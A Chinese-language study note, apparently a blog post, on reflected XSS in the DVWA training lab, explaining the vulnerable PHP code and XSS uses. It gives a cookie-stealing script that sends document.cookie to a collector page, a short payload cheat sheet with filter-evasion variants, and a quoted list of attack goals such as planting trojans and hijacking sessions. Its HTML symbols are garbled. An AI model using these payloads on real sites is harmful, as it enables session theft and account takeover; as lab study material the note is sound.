为什么dvwaw怎么安装xss xss没有弹框

我的DVWA学习笔记(4):XSS攻击初级篇
我的DVWA学习笔记(4):XSS攻击初级篇
今天我们来学习一下XSS攻击,今天边学边写。
国际惯例,先来答疑解惑。
问题1:什么是XSS?
&&& Cross Site
Script英文缩写:CSS又叫XSS,中文意思:。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行。XSS的攻击目标是为了盗取客户端的cookie或者其他网站用于识别客户端身份的敏感信息。获取到合法用户的信息后,攻击者甚至可以假冒最终用户与网站进行交互。
问题2:XSS的原理是什么?
XSS的原理也就是往HTML中注入脚本,HTML指定了脚本标记&script&&/script&.在没有过滤字符的情况下,只需要保持完整无错的脚本标记即可触发XSS,假如我们在某个资料提交内容,表单提交内容就是某个标记属性所赋的值,我们可以构造如下值来闭和标记来构造完整无错的脚本标记,
"&&script&alert('XSS');&/script&&"
这是一条很经典的语句,看看他能干什么呢?
打开DVWA,记得调难度,打开XSS攻击,出现一个页面,这里我输入dcc试一下:
看来就是根据你的名字返回“hello+你的名字”。看看源码也不过如此:
&?php if(!array_key_exists&("name",&$_GET)&||&$_GET['name']&==&NULL&||&$_GET['name']&==&''){
&$isempty&=&true;
&echo&'&pre&';
&echo&'Hello&'&.&$_GET['name'];
&echo&'&/pre&';
我们用经典语句替换name试一下:
&zero&script&alert('XSS');&/script&
就会输出:
可以看出调用函数输出了XSS弹窗,后面用户名为zero,其实&script&”你的注入语句“&/script&可以完成许多功能。
问题3:XSS能干什么呢?有什么更高级的应用?
  1、针对性挂马
  所以这类网站一定是游戏网站,银行网站或者是关于qq、taobao或者影响力相当大的网站等,它们必须有我们平常需要盗取的帐号密码;当然也或许是这个站点的浏览量相当高,我们能将更多的马挂出去。
  而如果仅仅是平平常常的一个小站点的XSS漏洞,如果我们要挂马,那么莫不如就直接把木马页面地址贴出去。
  2、用户权限下操作
 这类网站则必须有会员了,而且这些会员有很多有意义的操作或者有我们需要的内部个人资料,所以我们可以通过XSS对已登录访问者进行有权限操作。我认为
cookies的盗取应该算作这一项,因为其目的也是获取用户操作权限(盗密码包括在内),从而获取用户某些信息或者进行权限下的相关操作。
  3、Dos攻击或傀儡机
  这同样需要一个访问量非常大的站点,利用小站点莫不如我们自己攻击或获取信息。我们可以通过此页的访问用户不间断地攻击其他站点,或者进行局域网扫描等等。这类js工具早已经产生,js端口扫描、jikto、xssshell等等。
  4、提权
  一般这主要发生在论坛或信息管理系统,总之一定要有管理员了。这需要攻击者对目标系统相当熟悉(一般这样的系统需要开源代码),从而知道怎样构造语句进行提权。
  5、实现特殊效果
  譬如Monyer在百度空间的插入视频,插入版块;譬如一些人在新浪博客或者校内网实现的特殊效果等等。
  结论:
  从而你应该了解到这些网站应该具有的性质:
  极高的访问量,有会员,有管理员,有具有价值的帐号密码,或者有意义进行特殊效果的实现。
  如果你读过《Ajax Hacking with XSS》,你应该知道XSS至少包含input XSS和textarea
XSS等七种方式。
  其中url XSS属于input XSS,这些漏洞大部分属于保留式的XSS,而textarea
XSS等一般属于不保留XSS。
  这意味着正常访问一个页面是不会触发保留式的XSS的,尽管这是大部分网站具有的漏洞,其中搜索部分又称搜索式XSS漏洞。
   所以当你获取了一个input
XSS,你仅仅alert出一个小框框。你跟别人大吹大擂,你发现了一个漏洞,并且你可以alert一个框框给他看,但是事实上你什么都做不了。即使你能
挂些小木马,那也是很没意义的事情——因为你莫不如直接在自己的虚拟主机里做XSS页面发给别人。
  这个跟sql注入不同,XSS毕竟是
客户端的东西。sql注入的目的往往是为了得到目标系统的权限,并且sql语句本身执行的就是服务端的指令;但
XSS一般却是为了获得客户端的东西,执行的也是客户端的指令。所以他们可以“'”一下“出错了”而大喊,你却不能因为“alert”出了“xss窗口”
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
(摘自Monyer的百度空间)
一个小实例:还是DVWA的注入页面,假如我输入:
&script&document.location='/collector.html?cookie'+docment.cookie&/script&
那网站就会往发送本地用户的COOKIE,这样就能方便我伪造他的身份,之后用他的身份买东西什么的。。。。你懂得。
既然一定要来,可以让他直接显示,用语句:
&script&alert(document.cookie);&/script&就会显示:
这样就知道他的PHPSESSID了,呵呵。
还有常用语句:
&script&alert('店小弎')&/script&
最普通的xss代码
&script&alert(document.cookie);&/script&
获取cookie
src="javascript:alert('XSS')"& img链接地址xss
&& &script
src="ls.js"& &script&
外部调用攻击代码ls.js
&& &script
alert('xss')&/SCRIPT& 注释方法防止过滤
&& &img src=""
onerror=alert("xss")& 加载图像失败执行
&& &iframe
onload=alert('店小弎')& 框架
&script&location='';&/script&
跳转某页面
差不多了,大概你也了解了XSS攻击了,下次再见吧。
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。文章不存在_百度首页

我要回帖

更多关于 dvwaw怎么安装xss 的文章

 

随机推荐